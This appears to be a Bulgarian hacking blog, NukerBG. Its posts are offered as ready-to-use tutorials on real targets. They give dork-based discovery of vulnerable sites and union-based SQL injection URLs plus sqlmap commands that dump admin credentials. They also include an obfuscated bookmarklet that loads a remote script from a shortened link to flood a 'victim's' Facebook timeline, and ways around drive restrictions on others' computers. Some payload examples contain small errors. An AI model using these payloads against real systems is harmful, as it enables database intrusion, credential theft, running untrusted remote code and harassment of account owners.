SQL Injection (SQLi) - как да изтеглим информация от незащитен сървър

Внимание! Нека уважаваме труда на другите! Моля, не лийчвайте! Имате право да копирате урока, само при съгласие на администратор на NukerBG!

Въведение: 

SQL Injection е техника, която използва уязвимост в системата, позволяваща да вземете информация за база данни на дадено приложение. Уязвимостта се проявява, когато потребител въведе некоректно филтрирани знаци (' # и други). SQL инжекцията е позната още като SQL insertion attacks.

Полезни доркове ( google ) , с помощта на които можете да намерите уязвими сайтове:

 Лист с dork-ове

Когато търсите в гугъл, изберете си някой дорк и сложете inurl: пред него. (Ако няма)

ПРОВЕРКА ЗА УЯЗВИМОСТ

Например взимаме сайт с дорк "index.php?id="

http://www.example.com/index.php?id=3

За да проверим , дали е уязвим сайта, слагаме знак ' преди или след 3

http://www.example.com/index.php?id=3'

или

http://www.example.com/index.php?id='3

Ако сайтът е уязвим, трябва да излезе грешка от вида :

Error : You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

ВЗЕМАНЕ НА БРОЯ НА КОЛОНИТЕ

След като разберете дали сайтът е уязвим от първа стъпка, трябва да разберем броя на колоните. Най-лесният начин е да използваме стринга "order by". Всичко, което трябва да направите е да напишете ORDER BY (номер на колоните)-- в URL бара след края на линка. Направете го да изглежда така:

Пример:

http://www.example.com/index.php?id=3 order by 1--

http://www.example.com/index.php?id=3 order by 2--

http://www.example.com/index.php?id=3 order by 3--

http://www.example.com/index.php?id=3 order by 4--

http://www.example.com/index.php?id=3 order by 5--

http://www.example.com/index.php?id=3 order by 6--

http://www.example.com/index.php?id=3 order by 7--

http://www.example.com/index.php?id=3 order by 8--

http://www.example.com/index.php?id=3 order by 9--

Да кажем , че след последния ред (example.com/index.php?id=3 order by 9--) получим грешка. Това означава, че броят на колоните е предходната цифра (8). Ако грешката е на десетото число, значи колоните са 9. Ако грешката е на 50, значи имаме 49 колони. Но едва ли ще случите на толкова много. Ако имате лоша памет, ще е добре да си запишете някъде, защото ще ви потрябва по-нататък. :)

НАМИРАНЕ НА ДОСТЪПНИ КОЛОНИ

Сега като имаме броя на колоните, ние се нуждаем от цифрите на колоните, откъдето можем да вземем информация. Правим това посредством "UNION" "SELECT" и броя на колоните. Слагат се заедно в линка така:

http://www.example.com/index.php?id=-3+UNION+SELECT+1,2,3,4,5,6,7,8--

За последна цифра допълвате до броя на колоните. Пример: ако имаме 10 колони, ще напишем на края на линка ...-3+UNION+SELECT+1,2,3,4,5,6,7,8,9,10--. Ако имаме 15 колони ще напишем ...-3+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- и така нататък. Също така не забравяйте да сложите "-" пред id номера.

След като го направите, страницата трябва да изглежда малко разхвърляна/развалена и ще забележете 2 числа/цифри на страницата (удебелени). Тези числа/цифри показват от кои колони можем да вземем информация. По-късно ще ги използваме, като ги заменяме, така че ги запомнете/запишете. Ще приемем, че ни излиза 3.

НАМИРАНЕ НА ВЕРСИЯТА НА MYSQL БАЗА ДАННИ

Причината, поради която се нуждаете от версията на MYSQL е за да видите, дали си струва да инжектирате. Ако версията е над 5.0 следвайте инструкциите. Ако е под версия 5.0 , ще се използва Blind SQLi , за което ще напиша урок по-късно, така че наглеждайте форума /профила ми/.

Сега вземаме едно от числата, които открихме преди малко и го заменяме с "@@version" <запазена команда.

Това : example.com/index.php?id=-3+UNION+SELECT+1,2,3,4,5,6,7,8-- Ще стане http://www.example.com/index.php?id=-3+UNION+SELECT+1,2,@@version,4,5,6,7,8-- . След като заредите страницата, ще ви излезе версията на MYSQL DB .

НАМИРАНЕ НА ИМЕНА В БАЗА ДАННИ

Сега ще инжектираме сайта и ще намерим имената на база данните. Заменяме "@@version" със "group_concat(schema_name)" и добавяме +from+information_schema.schemata-- след последното число и края на линка. Така че линкът ще се промени:

example.com/index.php?id=-3+UNION+SELECT+1,2,@@version,4,5,6,7,8--

––––> http://www.example.com/index.php?id=-3+UNION+SELECT+1,2,group_concat(version),4,5,6,7,8+from+information_schema.schemata--

Това ще покаже имената на база аднните. Сега за да намерим коя се използва, заменяме "group_concat(schema_name)" с "concat(database())" и махаме "+from+information_schema.schemata". Така че линкът ще изглежда така:

http://www.example.com/index.php?id=-3+UNION+SELECT+1,2,concat(database()),4,5,6,7,8-- 

Това ще изведе името на база данните, която се ползва. Можете да си я запишете. Ще приемем, че ни дава primerna_baza_danni.

НАМИРАНЕ НА ИМЕНА НА ТАБЛИЦИ

За да вземем име на таблица от сегашната база данни, трябва да заменим "concat(database())" с "group_concat(table_name)" и да добавим from "information_schema.tables where table_schema=database()" между последната цифра и "--". Също така е желателно да премахнете "+" -овете. Сега линкът ще изглежда така:

http://www.example.com/index.php?id=-3 UNION SELECT 1,2,group_concat(table_name),4,5,6,7,8 from information_schema.tables where table_schema=database()--

На страницата трябва да се покажат имената на таблиците. Можете да си ги запишете , тъй като са важни за по-нататък. Ще приемем за примерна таблица primerna_tablica.

НАМИРАНЕ НА ИМЕНА НА КОЛОНИ

Това е точно като взимането на имената на таблиците. Само трябва да промените "table_name" на "column_name" и "information_schema.tables" на "information_schema.columns". Линкът ще изглежда така:

http://www.example.com/index.php?id=-3 UNION SELECT 1,2,group_concat(column_name),4,5,6,7,8 from information_schema.columns where table_schema=database()-- 

Така, това ще ви даде имената на колоните. Може да ги запишете.

Да кажем , че ни даде следните имена на колони:

admin_ime

admin_parola

ВЗЕМАНЕ НА ИНФОРМАЦИЯ

Сега можем да имаме името на базата данни, имената на таблиците, имената на колоните. Можем да ги обобщим в един код и да получим информация от тях. За да направим това ни е нужно:

http://www.example.com/index.php?id=-3 UNION SELECT 1,2,group_concat(име_на_колона,0x3a,име_на_колона,0x3a),4,5,6,7,8 from име_на_базата.име_на_таблицата--

Пояснение:

* Заменете име_на_колоната с името на вашата колона, която сте намерили.

* 0x3a ще сложи двуеточие (:) , за да раздели информацията. Можете да сложите колкото си искате имена на колони, важното е да ги разделите подобаващо. Също заменете име_на_базата.име_на_таблицата със съответно: името на база данните и името на таблицата, които сте намерили. След това линкът ще изглежда подобно:

http://www.example.com/index.php?id=-3 union select 1,group_concat(admin_ime,0x3a,admin_parola,0x3a),2,3,4,5,6,7,8 from primerna_baza_danni.primerna_tablica--

Сега имате основни знания за SQLi. Трябва да знаете, че този метод не важи за всички видове грешки в SQL. Има и вариант за изтегляне на информация чрез Blind SQLi, където нещата стават по-сложни. За това ще напишем урок по-нататък! Наслаждавайте се. Вложих много труд в тази статия, така че се надявам да ви хареса :)

Внимание! Нека уважаваме труда на другите! Моля, не лийчвайте! Имате право да копирате урока, само при съгласие на администратор на NukerBG!

Подновяваме дейността си!!!

Здравейте, драги читатели!

Сигурно сте забелязали, че отдавна блогът не е поддържан. Е, това вече ще се промени! Започваме отново да споделяме интересни и полезни трикове, свързани с компютри и интернет! Ще има доста разнообразни статии, тъй че няма да ви разочароваме!

Също така, можете да си поръчате туториал, статия. Просто го напишете като коментар в тази статия!

До скоро!

Flood във Facebook: Новия Timeline [HOWTO]

Следният начин за флуд на дадена стена/ timeline е много лесен, не изисква никакви специални умения в програмирането. Скриптът работи в Google Chrome, Mozilla Firefox, IE и др.

Как става? Трябва да отворите страницата/ timeline-а на жертвата в браузъра , след което въвеждате следния скрипт в адрес бара:

javascript:eval(String.fromCharCode(106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 58, 40, 97, 32, 61, 32, 40, 98, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 41, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 34, 115, 99, 114, 105, 112, 116, 34, 41, 41, 46, 115, 114, 99, 32, 61, 32, 34, 47, 47, 98, 105, 116, 46, 108, 121, 47, 101, 78, 53, 113, 87, 97, 34, 44, 32, 98, 46, 98, 111, 100, 121, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 97, 41, 59, 32, 118, 111, 105, 100, 40, 48, 41))

Появява се прозорец , който ще ви поиска съдържание, което да се поства на таймлайна заедно с колко съобщения да се заредят.

NukerBG НЕ отговаря за злонамерени деяния от страна на читателите на блога. Запазваме всички права за промяна на съдържанието на урока.

Инсталация на BackTrack R2 Gnome на Vmware

Инсталация на BackTrack5 R2 Gnome на VMware

1.Да кажа, че тази инсталация е специално за GNOME, при KDU има и разлики

2.Теглите си VMware Workstation

3.Теглите BackTrack 5 R2 в ISO,Gnome

4.Отваряте VMware Workstation след като сте я инсталирали.

5.Натискате на File > New Virtual Machine...

6. Избирате Typical > Next > Installer Disk Image File (iso) : избирате BackTrack-a > Next > Избирате Linux > Под него избирате Ubuntu / Ubuntu 64 bit > Next > Virtual Machine Name : BackTrack 5 (по избор) ,
Location : желателно е да има поне 20 gb free space , там където ще изберете. > Next > Maximum Disk Space : Не по-малко от 13. > Избирате Store Virtual Disk As A Single File > Next > Натискате Customize Hardware > Processors > Number Of Processors - 2 , Натискате Close > Finish

7. След като ви изпише "boot :" натиснете Enter

8. Като ви load-не екрана, изберете "BackTrack Text - Default Text Boot Mode"

9. След като зареди изчакайте 2 минути да ви изкара конзолата
Докато не изпише root@bt:~# не бутайте нищо. След като излезе напишете

startx


10. След като ви зареди пуснете "Install BackTrack"

11. English > Forward > Изберете времевата зона в която се намирате > Forward > Forward отново > Forward отново > Install. (ЩЕ ОТНЕМЕ ВРЕМЕ !!)

12. След като зареди, системата ще иска да се рестартира , цъкнете да се рестартва.

13. След като ви зареди screen-а в началото, ще ви иска bt_login и Password. bt_login-а е "root", password-a e "toor" (КАТО ПИШЕТЕ ПАРОЛАТА НЯМА ДА СЕ ВИЖДА)

14. След като ви зареди, пишете

passwd root

и напишете паролата която искате да бъде 2 пъти ..

15. Напишете startx

16. След като напълно ви зареди, изберете най-горе VM > Install VMware Tools...

17. На BackTrack-a ви трябва да се отвори една папка , копираите името на VMwareTools-........ (Файлът в дясно :D)

18. Отворете конзолата и напишете

cd /tmp

и Enter , после напишете

mkdir vm

и Enter

19. Oтворете нова конзола без да затваряте старата в новата напишете

cd /media/

и после Enter , после пишете

cd /media/VMware\ Tools/

и Enter. После пак пишете

cp VMwareTools-x.x.x-xxxxxx.tar.gz (името което копирахте) /tmp/vm/


20. Затворете конзолата.

21. Сега в началната конзола която не затворихте , пишете

ls

и Enter, трябва да ви изпише това което копирахте. Пишете


-tar -xzf VMwareTools-x.x.x-xxxxxx.tar.gz (това което копирахте)


22. След като зареди пишете

cd vmware-tools-distrib/


23. Напишете

ls

и Еnter , после напишете

perl vmware-install.pl

и Enter. Ще започне да ви пита разни неща , натискаите Enter на всяко ;)

24. След като зареди , напишете

cd ..

и Enter , после пак

cd ..

и Enter.

25. Напишете

-rm -rf vm*

и Еnter. След като зареди, напишете

reboot


26. Вече сте готови ! Ще ви иска bt_login и Password отново , напишете bt_login за "root" ( както винаги ще бъде) и Password ако не сте сменили паролата е "toor" (както почти винаги :D) След като зареди напишете startx . . . (винаги така се пуска BackTrack и всяка система на Linux)

27. Честит ви BackTrack 5 R2 !

Източник: cwi-group.org

SQLi чрез Backtrack

За начало пуснете backtrack и пуснете програмата sqlmap.Тя се намира в менюто
(Applications > BackTrack > Exploitation tools > Web exploitation tools > Sqlmap)

Следващото нещо което трябва да направим е да проверим сайта за грешки или по-точно за видими бази данни.Това е лесно.Въведете следния ред:

python sqlmap.py -u http://site.com/index.php?id=42 --dbs
След тази команда ще видите много резултати и малка таблица с имена на бази данни или ще изведе критични грешки, че сайта не уязвим.
Избираме някоя от дадените бази данни например DBNAME и пишем:

python sqlmap.py -u http://site.com/index.php?id=42 -D DBNAME --tables

Сега ще видим друга таблица показана и след като знаем това търсим колоната с администраторския акаунт и парола.

python sqlmap.py -u http://site.com/index.php?id=42 -D DBNAME -T TABLENAME --columns

Сега остава само да извадим нужната информация от колоната с тази команда : 

python sqlmap.py -u http://site.com/index.php?id=42 -D DBNAME -T TABLENAME -C COLUMNNAME --dump

Ако всичко е минало както трябва вече трябва да знаем администраторския account и криптирана парола(hash). Която 99% е md5 и не е особено трудна за разбиване. 

Ако сте получили тази информация Честито вие сте изпълнили вашата първа SQLi чрез тази популярна напоследак операционна система Backtrack .

Как да направим успешна Facebook група с много членове

Доста хора се питат този въпрос.Как да направим успешна Facebook група с много членове?

Много е важно да имате време което да отделите за развиването на групата.Като цяло трябва да имате идея какво точно искате от групата.Каква аудитория искате да имате.Каква ще е тематиката на групата.Ето няколко стъпки и съвета които е хубаво да прочетете за по-добро развитие на дадена група.

1.Името на групата е едно от най-важните неща както сами можете да се обедите в фейсбук има доста групи които са с над 20 000 члена само заради името.

2.Проучете какво върви.Търсете сензации нещо експлозивно.Нещо от новините което крайно не ви харесва и искате доста хора да го знаят.

3.Подържайте активност в групата за да не стигне тя един предел и да спре да се развива. Основно групите се развиват когато някой споделя ваши материали и неговите приятели ги виждат.Същото важи и за харесванията.

4.Изберете хубава снимка на групата също много важен избор

5.Попълнете хубаво и точно менюто информация.

6.Споделете групата с максимален брой приятели в предишна статия написах както точно да поканите всички ваши приятели без да ги избирате един по един.

7.Ако искате групата ви да е голяма можете да се регистрирате в трафик exchange сайтове там не е проблем за 1 седмица да направите група 20 000 човека.
Най-добрия такъв сайт е:
http://www.youlikehits.com  - Освен за фейсбук групи той е добър за subscribe на клип в youtube , twitter фенове , посещение на ваши сайтове ( трафик ) и доста други екстри. Точките се правят лесно и не е проблем да правите по 500 фена за час и половина.

Друга алтернатива на този сайт е :
http://www.claimfans.com/ref.php?id=51690 Добра алтернатива на предишния с около 60 000 абоната. Като предимство за него ще изтъкна ,че кредити се правят по лесно.

Последния съвет, който ще ви дам е накарайте максимален брой приятели да споделят групата или да поканят всичките си приятели вътре.

Как да поканим всичките си приятели в Facebook страница

Ето го и метода

1) Трябва ви Mozila Firefox минимална версия 6
2) Отваряте вашата Фен страница
3) Отваряте прозореца където се канят приятели
4) Цъкате на отметката all friends и въртите скрола докато не зареди всичките
5) Натискате тази комбинация ctrl + shift + K
6)  В показалия се прозорец въвеждате този код

elms=document.getElementById('pop_content').getElementsByTagName('li');
for(var fid in elms){if(typeof elms[fid] === 'object'){elms[fid].click();}}

Може да отнеме няколко минути докато прати поканите става бавно метода е от 14 ноември , но все още работи !


Коментари от рода на това не работи са излишни кода е проверен и работи за момента 07/03/2012г.

Как да получим достъп до диск C:// , ако е заключен ?

 
      Сигурно ви се е случвало да искате да проверите нещо на нечий компютър, но да разберете, че достъпът към диск C:// е ограничен ! Не се панирайте, имаме план Б . Сега ще ви разясним някои тънкости, които можете да използвате занапред.

НО ВИ ПРЕДУПРЕЖДАВАМЕ ! НЕ ТРИЙТЕ НИКАКВИ ФАЙЛОВЕ ОТ СИСТЕМНАТА ПАПКА ! НЕ ОТГОВАРЯМЕ ЗА ВАШИТЕ ПОСТЪПКИ. ВСИЧКО Е НА ВАША ОТГОВОРНОСТ !

За да се достигне до системния дял на Windows, могат да се използват няколко начина: Браузър , CMD , Linux и други. Ще се спрем на най-известните и най-лесните.

Метод #1 : Браузър: Mozilla Firefox / Chrome

Отворете Firefox или Google Chrome и напишете следното в адрес бара:

C:\

Това няма да ви позволи да отваряте файловете, но ще ви даде предимството да ги свалите. С други думи, нуждаете се от доста време, за да постигнете резултат с този метод.

Този метод се използва най-много като първа стъпка от друг метод, метода с CMD , като от браузъра можем да заредим пътя до файла и да го използваме в CMD.

Метод #2 : Command Prompt (CMD) 

Начин за Windows Vista и по-стари версии:
На някои компютри има ограничен достъп до notepad и cmd, от които се нуждаем. За да ги открием първо трябва да потърсим CMD в полето за търсене /start/ , за да видим дали е блокирано. Или отидете на 'C:\WINDOWS\system32\cmd.exe' или отидете в My Computer и потърсете за CMD с ctrl+f.

Вариант с notepad:

Отворете notepad и напишете 

command.com

Запишете като command.bat и като разширение : All Programs And Files . Уверете се, че го запазвате на работния плот.
Сега само отворете command.bat

Готово! Имате достъп до CMD !!! :)

Начин за Windows 7:

Отворете notepad, както на горния метод, само че вместо command.com напишете във файла:

@echo off
title CMD
:1
set /p a=%cd%^>
%a%
goto :1

Запазете като command.bat и го отворете. За да отворите диск C напишете C: 

А ако искате да отворите даден файл, първо трябва да намерите пътя към него чрез браузъра, и след това да напишете в конзолата : start C:\Windows\cmd.exe. Естествено можете да напишете на мястото Windows\cmd.exe пътя към файла, който искате да отворите. 

Това са начините за достъп чрез Windows , notepad и CMD.
Надяваме се урокът да ви е бил полезен.
Не отговаряме за вашите дейности, вие действате напълно на ваша отговорност.
Източници: hackforums/5ave